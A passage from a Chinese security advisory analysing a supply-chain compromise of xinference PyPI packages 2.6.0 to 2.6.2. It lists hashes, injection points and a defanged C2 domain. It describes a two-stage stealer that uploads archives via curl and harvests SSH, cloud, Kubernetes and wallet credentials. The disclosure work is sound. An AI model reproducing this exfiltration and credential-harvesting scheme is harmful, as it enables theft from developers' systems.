lang="EN-US" style="font-family: &#34;Segoe UI&#34;, sans-serif;color: rgb(30, 41, 59);background: white;" data-pm-slice="0 0 []"><span leaf="">971670c10eff28339a085ca50a600e35</span></span></span></p></td><td data-colwidth="164"><p><span style="font-size: 15px;"><span lang="EN-US" style="font-family: &#34;Segoe UI&#34;, sans-serif;color: rgb(30, 41, 59);background: white;" data-pm-slice="0 0 []"><span leaf="">xinference-2.6.0.tar.gz</span></span></span></p></td><td data-colwidth="207"><p><span style="font-size: 15px;"><span lang="EN-US" style="font-family: &#34;Segoe UI&#34;, sans-serif;color: rgb(30, 41, 59);background: white;" data-pm-slice="0 0 []"><span leaf="">2026-04-21 20:08:49 - 2026-04-21 20:10:51</span></span></span></p></td></tr><tr><td data-colwidth="203"><p><span style="font-size: 15px;"><span lang="EN-US" style="font-family: &#34;Segoe UI&#34;, sans-serif;color: rgb(30, 41, 59);background: white;" data-pm-slice="0 0 []"><span leaf="">9b3257e45b27a6bbe4e240e41a3a306f</span></span></span></p></td><td data-colwidth="164"><p><span style="font-size: 15px;"><span lang="EN-US" style="font-family: &#34;Segoe UI&#34;, sans-serif;color: rgb(30, 41, 59);background: white;" data-pm-slice="0 0 []"><span leaf="">xinference-2.6.1.tar.gz</span></span></span></p></td><td data-colwidth="207"><p><span style="font-size: 15px;"><span lang="EN-US" style="font-family: &#34;Segoe UI&#34;, sans-serif;color: rgb(30, 41, 59);background: white;" data-pm-slice="0 0 []"><span leaf="">2026-04-21 21:01:20 - 2026-04-21 21:03:30</span></span></span></p></td></tr><tr><td data-colwidth="203"><p><span style="font-size: 15px;"><span lang="EN-US" style="font-family: &#34;Segoe UI&#34;, sans-serif;color: rgb(30, 41, 59);background: white;" data-pm-slice="0 0 []"><span leaf="">484067fd6232f7cdd7b664b33857fc2c </span></span></span></p></td><td data-colwidth="164"><p><span style="font-size: 15px;"><span lang="EN-US" style="font-family: &#34;Segoe UI&#34;, sans-serif;color: rgb(30, 41, 59);background: white;" data-pm-slice="0 0 []"><span leaf="">xinference-2.6.2.tar.gz</span></span></span></p></td><td data-colwidth="207"><p data-mpa-action-id="mogmir0wsrx"><span style="font-size: 15px;"><span style=""><span lang="EN-US" style="font-family: &#34;Segoe UI&#34;, sans-serif;color: rgb(30, 41, 59);background: rgb(254, 255, 255);" data-pm-slice="0 0 []"><span leaf="">2026-04-21 21:07:50 - </span></span><span lang="EN-US" style="font-family: &#34;Segoe UI&#34;, sans-serif;color: rgb(30, 41, 59);background: white;"><span leaf="">2026-04-21 21:10:00</span></span></span></span></p></td></tr></tbody></table></p></div></div><p style="text-align: justify;text-indent: 2em;margin-top: 16px;"><span leaf="">此外，三个受影响版本中的恶意代码虽然使用相同的恶意编码载荷，但在植入位置与执行方式上存在显著差异，呈现出攻击者持续迭代优化的特征。</span></p></div></div><o:page></o:page></div><p style="text-indent: 0px;text-align: center;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="moglxmt81ipv"><span textstyle="" style="color: rgb(136, 136, 136);font-style: italic;">表2 三个版本植入恶意代码对比</span></span></p><div><div><div><div><div><div><div><p><table style="width:559px;"><tbody><tr><td data-colwidth="98"><p><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 15px;"><span leaf="">对比维度</span></span></span></p></td><td data-colwidth="149"><p><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 15px;"><span lang="EN-US" style="color: black;background: white;" data-pm-slice="0 0 []"><span leaf="">V2.6.0</span></span></span></span></p></td><td data-colwidth="153"><p><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 15px;"><span lang="EN-US" style="color: black;background: white;" data-pm-slice="0 0 []"><span leaf="">V2.6.1</span></span></span></span></p></td><td data-colwidth="159"><p><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 15px;"><span lang="EN-US" style="color: black;background: white;" data-pm-slice="0 0 []"><span leaf="">V2.6.2</span></span></span></span></p></td></tr><tr><td data-colwidth="98"><p><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 15px;"><span leaf="">植入位置</span></span></span></p></td><td data-colwidth="149"><p><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 15px;"><span style="color: black;background: white;" data-pm-slice="0 0 []"><span leaf="">模块顶层作用域</span></span></span></span></p></td><td data-colwidth="153"><p><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 15px;"><span lang="EN-US" style="color: black;background: white;" data-pm-slice="0 0 []"><span leaf="">_install() </span></span><span style="color: black;background: white;"><span leaf="">函数内部</span></span></span></span></p></td><td data-colwidth="159"><p><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 15px;"><span lang="EN-US" style="color: black;background: white;" data-pm-slice="0 0 []"><span leaf="">_install() </span></span><span style="color: black;background: white;"><span leaf="">函数内部</span></span></span></span></p></td></tr><tr><td data-colwidth="98"><p><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 15px;"><span leaf="">执行方式</span></span></span></p></td><td data-colwidth="149"><p><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 15px;"><span lang="EN-US" style="color: black;background: white;" data-pm-slice="0 0 []"><span leaf="">subprocess.Popen() </span></span><span style="color: black;background: white;"><span leaf="">子进程异步执行</span></span></span></span></p></td><td data-colwidth="153"><p><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 15px;"><span lang="EN-US" style="color: black;background: white;" data-pm-slice="0 0 []"><span leaf="">exec() </span></span><span style="color: black;background: white;"><span leaf="">当前进程同步执行</span></span></span></span></p></td><td data-colwidth="159"><p><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 15px;"><span lang="EN-US" style="color: black;background: white;" data-pm-slice="0 0 []"><span leaf="">subprocess.Popen() </span></span><span style="color: black;background: white;"><span leaf="">子进程异步执行</span></span></span></span></p></td></tr><tr><td data-colwidth="98"><p><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 15px;"><span leaf="">隐蔽性</span></span></span></p></td><td data-colwidth="149"><p><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 15px;"><span style="color: black;background: white;" data-pm-slice="0 0 []"><span leaf="">较低（顶层明文可见）</span></span></span></span></p></td><td data-colwidth="153"><p><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 15px;"><span style="color: black;background: white;" data-pm-slice="0 0 []"><span leaf="">较高（嵌入合法函数体）</span></span></span></span></p></td><td data-colwidth="159"><p data-mpa-action-id="mognowzx1fzg"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 15px;"><span style="color: black;background: white;" data-pm-slice="0 0 []"><span leaf="">较高（嵌入合法函数体）</span></span></span></span></p></td></tr></tbody></table></p></div><p style="margin-top: 16px;text-align: center;"><span leaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-ratio="0.5043243243243243" style="width: 553.74px;height: 279.27px;" data-w="1850" src="https://wechat2rss.xlab.app/img-proxy/?k=4f93a8e7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXJnA39fteqVCyXlfcROibnUPiaXChkzuick8MuKLP2USm8OxDm22gHv1A6ppByVsCcUoZiaL41QPxd42ZPpUPoGXtbRJEKyO3JPzgY%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></p></div></div></div></div></div></div><p style="text-indent: 0px;text-align: center;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="color: rgb(136, 136, 136);font-style: italic;">图2 xinference V2.6.0版本__init__.py文件恶意代码示例</span></span><o:page></o:page></p><p style="text-indent: 0px;text-align: center;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5549222797927461" data-w="1930" style="width: 553.74px;height: 307.27px;" src="https://wechat2rss.xlab.app/img-proxy/?k=2a3f7d2e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXKfNumPicUdxAmkzfUh79icnJicibwuww9q9zgZmNTlxn0GYvzflmib66sLHCUEpAxnicp6gk1n0xMolvVZSRane70VAibIOdnbcqiaxII%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></p><p style="text-indent: 0px;text-align: center;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="moglxmt824ph"><span textstyle="" style="color: rgb(136, 136, 136);font-style: italic;">图3 xinference V2.6.1版本__init__.py文件恶意代码示例</span></span></p><p style="text-indent: 0px;text-align: center;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.524031007751938" data-w="1935" style="width: 553.74px;height: 290.2px;" src="https://wechat2rss.xlab.app/img-proxy/?k=0f864c40&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXLm2ABe2EJIyTo69NCia42oGUpGNx0s9bSXEoibheoEMzHCclZK8U5LplOPDCuUPQl9T7sib4uYia0d9OeRQoqJRMpn8oqKqNgbAy0%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></p><p style="text-indent: 0px;text-align: center;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="moglxmt8xct"><span textstyle="" style="color: rgb(136, 136, 136);font-style: italic;">图4 xinference V2.6.2版本__init__.py文件恶意代码示例</span></span></p><p style="text-indent: 2em;text-align: justify;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="moglxmt8t59">对恶意载荷进行分析确认，该恶意采用了分阶段执行的方式：第一阶段负责载荷释放、结果打包与外传；第二阶段负责在受害主机中大范围搜集敏感信息与凭证材料。</span></p><p style="text-indent: 0px;text-align: justify;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="moglxmt81wbi"><span textstyle="" style="font-weight: bold;">第一阶段：</span></span></p><p style="text-indent: 2em;text-align: justify;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="moglxmt81b2z">第一阶段脚本开头即包含明显的攻击者标记 “# hacked by teampcp”。其主要功能将内嵌BASE64内容解码，通过 subprocess.run() 调用当前 Python 解释器执行这段解码后的第二阶段脚本，标准输出被写入临时文件 f。如果收集到内容，就用 tar -czf 打包为 love.tar.gz。最后使用自定义头“X-QT-SR”，通过 curl 以二进制流上传到C2域名 https[:]//whereisitat[.]lucyatemysuperbox.space/。</span><o:page></o:page></p><p style="text-indent: 0px;text-align: center;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img class="rich_pages wxw-img" data-aistatus="1" data-ratio="0.7448849104859335" style="width: 553.74px;height: 412.47px;" data-w="1564" src="https://wechat2rss.xlab.app/img-proxy/?k=5e72e1de&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXLzZyZggZwby4g8DqpEU164w2lrDdq7sJa43cqQYGaHtvE9fkSdjQeYp45gYlj9DVC8WSL6QbzrjzKoKu1Smhkj4A0ruicxO8bs%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></p><p style="text-indent: 0px;text-align: center;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="color: rgb(136, 136, 136);font-style: italic;">图</span></span><span leaf="" style="line-height: 1.6em;color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="moglxmt8lpp"><span textstyle="" style="color: rgb(136, 136, 136);font-style: italic;">5 阶段1恶意代码示例</span></span></p><p style="text-indent: 0px;text-align: justify;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="moglxmt8173i"><span textstyle="" style="font-weight: bold;">第二阶段：</span></span></p><p style="text-indent: 2em;text-align: justify;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span lang="EN-US" mpa-font-style="moglxmt820bj" style="font-size: 17px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">第二阶段样本核心目标是批量搜集主机、容器、云凭证、密钥、配置、历史记录和区块链钱包材料。</span></span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="text-indent: 0px;text-align: justify;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span lang="EN-US" mpa-font-style="moglxmt820bj" style="font-size: 17px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">主机与网络环境探测：收集主机名、当前路径、执行身份、内核、网卡、路由及全部环境变量，进行主机画像。</span></span></p></li><li><p style="text-indent: 0px;text-align: justify;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span lang="EN-US" mpa-font-style="moglxmt820bj" style="font-size: 17px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">SSH 凭证与主机密钥窃取：获取用户 SSH 私钥、主机私钥和信任关系信息；</span></span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="text-indent: 0px;text-align: justify;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span lang="EN-US" mpa-font-style="moglxmt820bj" style="font-size: 17px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">开发者与源码仓库凭证窃取：搜集了 .git-credentials 及各类包管理与依赖仓库的认证文件；</span></span></p></li><li><p style="text-indent: 0px;text-align: justify;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span lang="EN-US" mpa-font-style="moglxmt820bj" style="font-size: 17px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">环境变量与 `.env` 配置搜集：获取数据库密码、应用密钥、JWT secret、第三方 API Token；</span></span></p></li><li><p style="text-indent: 0px;text-align: justify;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span lang="EN-US" mpa-font-style="moglxmt820bj" style="font-size: 17px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">AWS 凭证搜集与云元数据打点：从本地凭证、容器角色凭证、实例角色凭证三条路径拿 AWS 访问权限；</span></span></p></li><li><p style="text-indent: 0px;text-align: justify;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span lang="EN-US" mpa-font-style="moglxmt820bj" style="font-size: 17px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">Kubernetes 凭证与集群秘密搜集：获取集群访问令牌、命名空间 secrets、控制面配置；</span></span></p></li><li><p style="text-indent: 0px;text-align: justify;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span lang="EN-US" mpa-font-style="moglxmt820bj" style="font-size: 17px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">GCP / Azure / Docker 凭证搜集：窃取云平台访问令牌与镜像仓库认证信息；</span></span></p></li><li><p style="text-indent: 0px;text-align: justify;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span lang="EN-US" mpa-font-style="moglxmt820bj" style="font-size: 17px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">数据库、消息与系统侧敏感配置搜集：窃取数据库与基础设施认证数据；</span></span></p></li><li><p style="text-indent: 0px;text-align: justify;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span lang="EN-US" mpa-font-style="moglxmt820bj" style="font-size: 17px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">VPN、IaC 与证书材料搜集：获取基础设施部署凭据、TLS 私钥与网络接入配置；</span></span></p></li><li><p style="text-indent: 0px;text-align: justify;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span lang="EN-US" mpa-font-style="moglxmt820bj" style="font-size: 17px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">Webhook/Token 模式搜索：递归扫描并窃取目标系统中的 Slack/Discord Webhook 地址及硬编码的 API 密钥、访问令牌等敏感凭证；</span></span></p></li><li><p style="text-indent: 0px;text-align: justify;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span lang="EN-US" mpa-font-style="moglxmt820bj" style="font-size: 17px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">加密货币钱包与节点密钥窃取：针对数字资产钱包、验证者节点和签名密钥；</span></span></p></li><li><p style="text-indent: 0px;text-align: justify;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span lang="EN-US" mpa-font-style="moglxmt820bj" style="font-size: 17px;"><span 